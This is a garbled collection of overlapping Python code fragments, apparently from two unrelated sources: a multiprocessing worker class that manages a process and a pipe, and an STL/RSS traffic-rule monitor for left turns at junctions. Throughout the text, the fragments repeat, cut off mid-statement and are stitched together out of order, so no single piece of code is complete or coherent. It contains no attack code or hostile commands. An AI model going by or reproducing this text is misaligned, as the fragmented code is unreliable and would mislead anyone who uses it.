check_alive", "*args, func=func, **kwargs)) # # return self # # def update_userfunc(self, userfunc: Callable):", "or raise exception. ''' try: payload = self.pipe.recv() if self.verbose: print(f'{self} received: {payload}')", "from user function.''' return self.recv().data def send_data(self, data: Any, **kwargs) -> None: '''Send", "# start worker if requested if start: self.start() def __repr__(self): return f'{self.__class__.__name__}[{self.pid}]' def", "None: args = args if args is not None else tuple() kwargs =", "# def is_alive(self): # return len(self) > 0 and all([w.is_alive() for w in", "dict() userfunc = UserFunc(target, *args, **kwargs) else: userfunc = None ctx = multiprocessing.get_context(method)", "from .messaging import (BaseMessage, DataPayload, SigClose, StatusRequest, UserFunc, UserFuncException, WorkerError, WorkerStatus) from .workerprocess", "to worker process. ''' return self.send_payload(UserFunc(func, *args, **kwargs)) def get_status(self): '''Blocking request status", "self.clear() # # def terminate(self): # [w.terminate() for w in self] # self.clear()", "= True, verbose: bool = False, method: str = 'forkserver'): '''Open Process and", "__exit__(self, exc_type, exc_value, exc_tb): self.join() def __del__(self): if self.verbose: print(f'{self}.__del__ was called!') self.terminate(check_alive=False)", "for ind in range(num_workers): # self.append(WorkerResource(ind, *args, func=func, **kwargs)) # # return self", "############### Main interface methods ############### def poll(self) -> bool: '''Check if worker sent", "Pipe, Pool, Process, Value from typing import Any, Callable, Dict, Iterable, List, NewType,", "'''Send data to worker and blocking return result upon reception. 
''' self.send_data(data) return", "logging=logging), ) # start worker if requested if start: self.start() def __repr__(self): return", "NewType, Tuple, Union from .exceptions import (UserFuncRaisedException, WorkerDiedError, WorkerIsAliveError, WorkerIsDeadError, WorkerResourceReceivedUnidentifiedMessage) from .messaging", "return self.pipe.poll() def execute(self, data: Any): '''Send data to worker and blocking return", "verbose: bool = False, method: str = 'forkserver'): '''Open Process and pipe to", "self.start() return self def __exit__(self, exc_type, exc_value, exc_tb): self.join() def __del__(self): if self.verbose:", "data: Any, **kwargs) -> None: '''Send any data to worker process to be", "user function.''' return self.recv().data def send_data(self, data: Any, **kwargs) -> None: '''Send any", "None: '''Send a Message (DataPayload or otherwise) to worker process. ''' if not", "# # return self # # def update_userfunc(self, userfunc: Callable): # return [w.update_userfunc(userfunc)", "if self.verbose: print(f'{self} sending: {payload}') try: return self.pipe.send(payload) except BrokenPipeError: raise WorkerDiedError(self.proc.pid) def", "already has running workers.') # # # start each worker # for ind", "Callable, *args, **kwargs): '''Send a new UserFunc to worker process. ''' return self.send_payload(UserFunc(func,", "poll(self) -> bool: '''Check if worker sent anything. ''' return self.pipe.poll() def execute(self,", "WorkerIsDeadError('.join()', self.proc.pid) try: self.pipe.send(SigClose()) except BrokenPipeError: pass return self.proc.join() def terminate(self, check_alive=True): '''Send", "import os from multiprocessing import Lock, Pipe, Pool, Process, Value from typing import", "= 'forkserver'): '''Open Process and pipe to it. 
class WorkerResource:
    '''Manages a worker process and the duplex pipe used to talk to it.

    The resource owns two things: ``self.proc`` (a child process running a
    ``WorkerProcess`` message loop) and ``self.pipe`` (this side of a duplex
    ``multiprocessing.Pipe``).  All communication with the worker goes
    through the payload/recv methods below.
    '''
    __slots__ = ['pipe', 'proc', 'verbose']

    def __init__(self, target: Callable = None, start: bool = False, args=None,
                 kwargs=None, logging: bool = True, verbose: bool = False,
                 method: str = 'forkserver'):
        '''Open a Process and a pipe to it.

        Args:
            target: optional user function the worker applies to incoming data.
            start: if True, start the worker process immediately.
            args: positional arguments bound into the UserFunc (default empty).
            kwargs: keyword arguments bound into the UserFunc (default empty).
            logging: forwarded to WorkerProcess.
            verbose: print debug messages on send/receive and destruction.
            method: multiprocessing start method (default 'forkserver').
        '''
        self.verbose = verbose

        # Wrap the target (if any) together with its bound arguments; a
        # worker created without a target waits for update_userfunc().
        if target is not None:
            args = args if args is not None else tuple()
            kwargs = kwargs if kwargs is not None else dict()
            userfunc = UserFunc(target, *args, **kwargs)
        else:
            userfunc = None

        ctx = multiprocessing.get_context(method)
        self.pipe, worker_pipe = Pipe(duplex=True)
        self.proc = ctx.Process(
            target=WorkerProcess(worker_pipe, userfunc=userfunc,
                                 verbose=verbose, logging=logging),
        )

        # optionally start the worker right away
        if start:
            self.start()

    def __repr__(self):
        return f'{self.__class__.__name__}[{self.pid}]'

    def __enter__(self):
        # Context-manager entry: make sure the worker is running.
        if not self.is_alive():
            self.start()
        return self

    def __exit__(self, exc_type, exc_value, exc_tb):
        # Context-manager exit: ask the worker to close and wait for it.
        self.join()

    def __del__(self):
        if self.verbose: print(f'{self}.__del__ was called!')
        # check_alive=False so a dead worker does not raise here.
        # NOTE(review): Process.terminate() on a never-started process still
        # raises — confirm whether unstarted resources can reach __del__.
        self.terminate(check_alive=False)

    ############### Main interface methods ###############
    def poll(self) -> bool:
        '''Check (non-blocking) whether the worker sent anything.'''
        return self.pipe.poll()

    def execute(self, data: Any):
        '''Send data to the worker and block until the result is received.'''
        self.send_data(data)
        return self.recv_data()

    def recv_data(self) -> Any:
        '''Receive raw data (the payload contents) from the user function.'''
        return self.recv().data

    def send_data(self, data: Any, **kwargs) -> None:
        '''Send any data to the worker process to be handled by the user function.'''
        return self.send_payload(DataPayload(data, **kwargs))

    def update_userfunc(self, func: Callable, *args, **kwargs):
        '''Send a new UserFunc to the worker process, replacing the current one.'''
        return self.send_payload(UserFunc(func, *args, **kwargs))

    def get_status(self):
        '''Blocking request for a status update from the worker.'''
        self.send_payload(StatusRequest())
        return self.recv()

    ############### Pipe interface ###############
    def send_payload(self, payload: BaseMessage) -> None:
        '''Send a Message (DataPayload or otherwise) to the worker process.

        Raises:
            WorkerIsDeadError: the worker process is not alive.
            WorkerDiedError: the pipe broke while sending.
        '''
        if not self.proc.is_alive():
            raise WorkerIsDeadError('.send_payload()', self.proc.pid)

        if self.verbose: print(f'{self} sending: {payload}')
        try:
            return self.pipe.send(payload)
        except BrokenPipeError as e:
            # chain the cause so the broken-pipe traceback is preserved
            raise WorkerDiedError(self.proc.pid) from e

    def recv(self) -> DataPayload:
        '''Return a received DataPayload/WorkerStatus, or raise the worker's error.

        Raises:
            WorkerDiedError: the pipe closed or reset (worker died).
            UserFuncRaisedException: the user function raised in the worker.
            WorkerResourceReceivedUnidentifiedMessage: unknown message type.
        '''
        try:
            payload = self.pipe.recv()
            if self.verbose: print(f'{self} received: {payload}')
        except (BrokenPipeError, EOFError, ConnectionResetError) as e:
            if self.verbose: print('caught one of (BrokenPipeError, EOFError, ConnectionResetError)')
            raise WorkerDiedError(self.proc.pid) from e

        # dispatch on the message type
        if isinstance(payload, (DataPayload, WorkerStatus)):
            return payload
        elif isinstance(payload, WorkerError):
            raise payload.e
        elif isinstance(payload, UserFuncException):
            raise UserFuncRaisedException(payload.e)
        else:
            raise WorkerResourceReceivedUnidentifiedMessage()

    ############### Process interface ###############
    @property
    def pid(self):
        '''Process id of the worker (None before start).'''
        return self.proc.pid

    def is_alive(self, *args, **kwargs):
        '''Get alive status of the worker process.'''
        # fixed parameter-name typo (*arsg -> *args); pass-through unchanged
        return self.proc.is_alive(*args, **kwargs)

    def start(self):
        '''Start the process; raises WorkerIsAliveError if already alive.'''
        if self.proc.is_alive():
            raise WorkerIsAliveError('.start()', self.proc.pid)
        return self.proc.start()

    def join(self, check_alive=True):
        '''Send SigClose() to the worker and then wait for it to die.'''
        if check_alive and not self.proc.is_alive():
            raise WorkerIsDeadError('.join()', self.proc.pid)
        try:
            self.pipe.send(SigClose())
        except BrokenPipeError:
            # worker already gone; still join below to reap the process
            pass
        return self.proc.join()

    def terminate(self, check_alive=True):
        '''Send a terminate signal to the worker.'''
        if check_alive and not self.proc.is_alive():
            raise WorkerIsDeadError('.terminate()', self.proc.pid)
        return self.proc.terminate()
''' return self.pipe.poll() def execute(self, data: Any): '''Send", "raise payload.e elif isinstance(payload, UserFuncException): raise UserFuncRaisedException(payload.e) else: raise WorkerResourceReceivedUnidentifiedMessage() ############### Process interface", "bool = False, method: str = 'forkserver'): '''Open Process and pipe to it.", "UserFuncException): raise UserFuncRaisedException(payload.e) else: raise WorkerResourceReceivedUnidentifiedMessage() ############### Process interface ############### @property def pid(self):", "Any): '''Send data to worker and blocking return result upon reception. ''' self.send_data(data)", "BrokenPipeError: pass return self.proc.join() def terminate(self, check_alive=True): '''Send terminate signal to worker.''' if", "WorkerPool already has running workers.') # # # start each worker # for" ]
[ "the right of way. [...] Nor must a road user who is obliged", "\"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"] assert all([p in rss_params for p in required_parameters])", "obs_signals]), f\"missing in signals ({obs_signals} not in {data.keys()})\" # generate output signals from", "= {} out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] =", "only proceed if they can see that they will neither endanger nor substantially", "= f\"({V_lon_e_stop} or {C_react_or_crossed})\" # specification # note: non-strict release operator is written", "> d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc <= 0)\" V_lon_e_stop = \"(v_lon_e <= 0)\" C_react_or_crossed", "output signals from input signals out_signals = {} out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"] =", "phi_2) \"\"\" @property def variables(self): return [\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\",", "= self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals = {k: list(v) for k,", "opposite directions: <<[...] 
They may only proceed if they can see that they", "S = f\"(({E_canbrake} and not(next({E_canbrake}))) and (not({C_canbrake})) and ({E_not_injunc}))\" P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}]", "out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals =", "P_leftturn = f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp = f\"always (({S} and", "= data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"]", "response = \"ego brakes until reach zero-velocity or other car crossed the intersection\"", "(not({C_canbrake})) and ({E_not_injunc}))\" P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond})", "generate output signals from input signals out_signals = {} out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"]", "for two cars approaching a junction in opposite directions: <<[...] 
They may only", "just remove the `d_f_brake` term from the calculation d_b_prebr = data[v_field] * self._p['rho']", "account 2 possible implementation of the distance metric (only-positive or pos-neg) If pos-neg,", "2 d_b_brake_num = ((data[v_field] + self._p['rho'] * self._p['a_lon_maxacc']) ** 2) d_b_brake_den = 2", "min, max longitudinal acceleration when breaking `a_lon_minacc`, `a_lon_maxacc` : min, max longitudinal acceleration", "junction is stationary # then, we just remove the `d_f_brake` term from the", "(car_can_brake) Note: this condition takes into account 2 possible implementation of the distance", "{P_leftturn}))\" return phi_lt_resp @property def demo_spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\"", "from input signals out_signals = {} out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"]", "d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min def generate_signals_for_demo(self, data: Dict[str, np.ndarray], begin:int=5, end:int=1000)", "rule implement the Traffic Rule for two cars approaching a junction in opposite", "generate output signals from input signals out_signals = {} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] -", "d(car,j)=inf, then car_can_brake and release_condition is true *Rewriting*: some operators have been rewritten", "has pos-neg interpret. 
A_lon_e_maxacc = f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e <= -{self._p['a_lon_minbr']})\"", "of the episode length, used to monitor open intervals \"\"\" required_parameters = [\"a_lon_minbr\",", "rss_params): \"\"\" :param rss_params: static parameters for rss monitoring `a_lon_minbr`, `a_lon_maxbr` : min,", "v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals = {k: list(v[begin:end]) for k, v in", "d_b_brake_num = ((data[v_field] + self._p['rho'] * self._p['a_lon_maxacc']) ** 2) d_b_brake_den = 2 *", "STL: premise = (ego_can_brake AND NOT(next(ego_can_brake))) AND (car_can_brake) AND (is_in_junction(ego, j)<=0) ego_can_brake =", "signals from input signals out_signals = {} out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"]", "and ({E_not_injunc}))\" P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}]", "when car crosses junction, d(car,j)=inf, then car_can_brake and release_condition is true *Rewriting*: some", "Nor must a road user who is obliged to give way substantially impede", "not(not(phi_1) Until_i not(phi_2)) - Def. Non-Strict Release: phi_1 R^ns_I phi_2 = phi_1 R_I", "road user who has the right of way. [...] Nor must a road", "Rule for two cars approaching a junction in opposite directions: <<[...] 
They may", "\"float\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\"] def __init__(self, rss_params): \"\"\" :param rss_params:", "d_b_prebr + d_b_brake d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min def generate_signals_for_demo(self, data: Dict[str,", "/ d_b_brake_den d_diff = d_b_prebr + d_b_brake d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min", "proper response = \"ego brakes until reach zero-velocity or other car crossed the", "`next` operator, we need discrete-time stl) `max_steps`: overestimation of the episode length, used", "phi_2 = phi_1 R_I (phi_1 or phi_2) \"\"\" @property def variables(self): return [\"time\",", "np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min def generate_signals_for_demo(self, data: Dict[str, np.ndarray], begin:int=5, end:int=1000) -> Dict[str,", "f\"(({E_canbrake} and not(next({E_canbrake}))) and (not({C_canbrake})) and ({E_not_injunc}))\" P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or", "and {P_brake})\" # resulting specification phi_lt_resp = f\"(next (not {S})) -> (next {P_leftturn})\"", "= data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] =", "(v_lon(ego) <= 0) OR (dist(car, j) <= 0) OR (car_can_brake) Note: this condition", "f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp = f\"(next (not {S})) -> (next", "AND (is_in_junction(ego, j)<=0) ego_can_brake = dist(ego,j) > d_lon_safe(ego,j) car_can_brake = dist(car,j) > d_lon_safe(car,j)", "<= 0)\" V_lon_e_stop = \"(v_lon_e <= 0)\" C_react_or_crossed = f\"({C_canbrake} or (d_lon_cj<0))\" #", "[\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert all([s in data for s", "# specification # note: non-strict release operator is written using not and until", "f\"missing 
in signals ({obs_signals} not in {data.keys()})\" # generate output signals from input", "data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data,", "<= a_lon_maxacc) plan_brake = (release_condition) R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr) release_condition = (v_lon(ego) <=", "see that they will neither endanger nor substantially impede a road user who", "car_can_brake and release_condition is true *Rewriting*: some operators have been rewritten to match", "metric (only-positive or pos-neg) If pos-neg, when car crosses junction, d(car,j)<0 and then", "2 * self._p['a_lon_minbr'] d_b_brake = d_b_brake_num / d_b_brake_den d_diff = d_b_prebr + d_b_brake", "end:int=1000) -> Dict[str, List]: # check input obs_signals = [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\",", "junction in opposite directions: <<[...] They may only proceed if they can see", "\"float\"] def __init__(self, rss_params): \"\"\" :param rss_params: static parameters for rss monitoring `a_lon_minbr`,", "out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals = {k: list(v[begin:end]) for k, v in out_signals.items()}", "Until_i not(phi_2)) - Def. Non-Strict Release: phi_1 R^ns_I phi_2 = phi_1 R_I (phi_1", "def demo_spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj >", "the `d_f_brake` term from the calculation d_b_prebr = data[v_field] * self._p['rho'] + 1", "assumption that v_front = 0, because a junction is stationary # then, we", "(release_condition) R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc) plan_brake = (release_condition) R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr) release_condition", "a junction in opposite directions: <<[...] 
They may only proceed if they can", "has no time to brake\" proper response = \"ego brakes until reach zero-velocity", "(a_lon(ego) <= a_lon_maxacc) plan_brake = (release_condition) R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr) release_condition = (v_lon(ego)", "P_leftturn = f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp = f\"(next (not {S}))", "phi_1 R^ns_I phi_2 = phi_1 R_I (phi_1 or phi_2) \"\"\" @property def variables(self):", "and then release_condition is true (the ego can cross) If only-pos, when car", "premise = (ego_can_brake AND NOT(next(ego_can_brake))) AND (car_can_brake) AND (is_in_junction(ego, j)<=0) ego_can_brake = dist(ego,j)", "behind formalization: premise = \"ego is approaching but not occupying the junction j,", "OR (dist(car, j) <= 0) OR (car_can_brake) Note: this condition takes into account", "-> np.ndarray: # note: the only change is the assumption that v_front =", "C_react_or_crossed = f\"({C_canbrake} or (d_lon_cj<0))\" # the check on d_lon_cj in case d", "is true *Rewriting*: some operators have been rewritten to match the rtamt spec", "that v_front = 0, because a junction is stationary # then, we just", "({E_not_injunc}))\" P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond}", "self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals = {k: list(v[begin:end]) for k, v", "out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals = {k: list(v) for", "length, used to monitor open intervals \"\"\" required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", 
\"rho_dt\",", "`a_lon_minacc`, `a_lon_maxacc` : min, max longitudinal acceleration `rho`: reaction time in seconds `rho_dt`:", "\"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert all([s in data for s in obs_signals]), f\"missing in", "= \"ego brakes until reach zero-velocity or other car crossed the intersection\" Formalization", "= {} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) /", "- data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"]", "obliged to give way substantially impede a road user who has the right", "release_condition = (v_lon(ego) <= 0) OR (dist(car, j) <= 0) OR (car_can_brake) Note:", "(note: we use `next` operator, we need discrete-time stl) `max_steps`: overestimation of the", "demo_spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj > d_lon_min_cj)\"", "# note: non-strict release operator is written using not and until S =", "\"float\", \"float\"] def __init__(self, rss_params): \"\"\" :param rss_params: static parameters for rss monitoring", "Traffic Rule for two cars approaching a junction in opposite directions: <<[...] 
They", "monitor open intervals \"\"\" required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"] assert", "data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals = {k: list(v)", "data: Dict[str, np.ndarray], v_field: str) -> np.ndarray: # note: the only change is", "\"\"\" @property def variables(self): return [\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"]", "= d_b_prebr + d_b_brake d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min def generate_signals_for_demo(self, data:", "in opposite directions: <<[...] They may only proceed if they can see that", "assert all([s in out_signals for s in self.variables]), f\"missing out signals ({self.variables} not", "into the other road.>> Intuition behind formalization: premise = \"ego is approaching but", "check input obs_signals = [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert all([s", "not({release_cond} or {A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_minbr})))\" P_leftturn = f\"({P_react}", "= f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop} or {C_react_or_crossed})\" # specification # note:", "AND plan_brake plan_react = (release_condition) R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc) plan_brake = (release_condition) R^ns_{rho:inf}", "phi_lt_resp = f\"(next (not {S})) -> (next {P_leftturn})\" return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data:", "in obs_signals]), f\"missing in signals ({obs_signals} not in {data.keys()})\" # generate output signals", "in seconds `rho_dt`: reaction time in number of 
steps (note: we use `next`", "class TrafficRuleLeftTurn(STLRule): \"\"\" This rule implement the Traffic Rule for two cars approaching", "out_signals = {k: list(v[begin:end]) for k, v in out_signals.items()} # check output assert", "or phi_2) \"\"\" @property def variables(self): return [\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\",", "TrafficRuleLeftTurn(STLRule): \"\"\" This rule implement the Traffic Rule for two cars approaching a", "out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"]", "= f\"({C_canbrake} or (d_lon_cj<0))\" # the check on d_lon_cj in case d has", "-> (next {P_leftturn})\" return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray], v_field: str) ->", "or {A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp = f\"always", "d has pos-neg interpret. A_lon_e_maxacc = f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e <=", "R^ns_I phi_2 = phi_1 R_I (phi_1 or phi_2) \"\"\" @property def variables(self): return", "data[v_field] * self._p['rho'] + 1 / 2 * self._p['a_lon_maxacc'] * self._p['rho'] ** 2", "types(self): return [\"int\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\"] def __init__(self, rss_params):", "for p in required_parameters]) self._p = {p: rss_params[p] for p in required_parameters} @property", "(next (not {S}))) -> (next {P_leftturn}))\" return phi_lt_resp @property def demo_spec(self): # predicates", "np.ndarray], v_field: str) -> np.ndarray: # note: the only change is the assumption", "way. [...] 
Nor must a road user who is obliged to give way", "input signals out_signals = {} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"]", "def spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj >", "signals out_signals = {} out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"]", "or pos-neg) If pos-neg, when car crosses junction, d(car,j)<0 and then release_condition is", "`a_lon_maxacc` : min, max longitudinal acceleration `rho`: reaction time in seconds `rho_dt`: reaction", "overestimation of the episode length, used to monitor open intervals \"\"\" required_parameters =", "Release: phi_1 R_I phi_2 = not(not(phi_1) Until_i not(phi_2)) - Def. Non-Strict Release: phi_1", "= {p: rss_params[p] for p in required_parameters} @property def spec(self): # predicates E_canbrake", "the right of way when the latter turns into the other road.>> Intuition", "d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc <= 0)\" V_lon_e_stop = \"(v_lon_e <= 0)\" C_react_or_crossed =", "phi_lt_resp @property def demo_spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake =", "1 / 2 * self._p['a_lon_maxacc'] * self._p['rho'] ** 2 d_b_brake_num = ((data[v_field] +", "= dist(ego,j) > d_lon_safe(ego,j) car_can_brake = dist(car,j) > d_lon_safe(car,j) plan = plan_react AND", "List import numpy as np from stl_rules.stl_rule import STLRule class TrafficRuleLeftTurn(STLRule): \"\"\" This", "\"float\", \"float\", \"float\"] def __init__(self, rss_params): \"\"\" :param rss_params: static parameters for rss", "= data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] =", "because a junction is stationary # then, we just remove the `d_f_brake` 
term", "this condition takes into account 2 possible implementation of the distance metric (only-positive", "d_b_brake d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min def generate_signals_for_demo(self, data: Dict[str, np.ndarray], begin:int=5,", "-{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop} or {C_react_or_crossed})\" # specification # note: non-strict release operator", "self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals = {k: list(v[begin:end]) for k, v in out_signals.items()} # check", "<<[...] They may only proceed if they can see that they will neither", "= ((data[v_field] + self._p['rho'] * self._p['a_lon_maxacc']) ** 2) d_b_brake_den = 2 * self._p['a_lon_minbr']", "check input obs_signals = [\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert all([s", "the check on d_lon_cj in case d has pos-neg interpret. A_lon_e_maxacc = f\"(a_lon_e", "= self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals = {k: list(v[begin:end]) for k, v in out_signals.items()} #", "data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals", "= np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"]", "crossed the intersection\" Formalization in STL: premise = (ego_can_brake AND NOT(next(ego_can_brake))) AND (car_can_brake)", "is true (the ego can cross) If only-pos, when car crosses junction, d(car,j)=inf,", "resulting specification phi_lt_resp = f\"always (({S} and (next (not {S}))) -> (next {P_leftturn}))\"", 
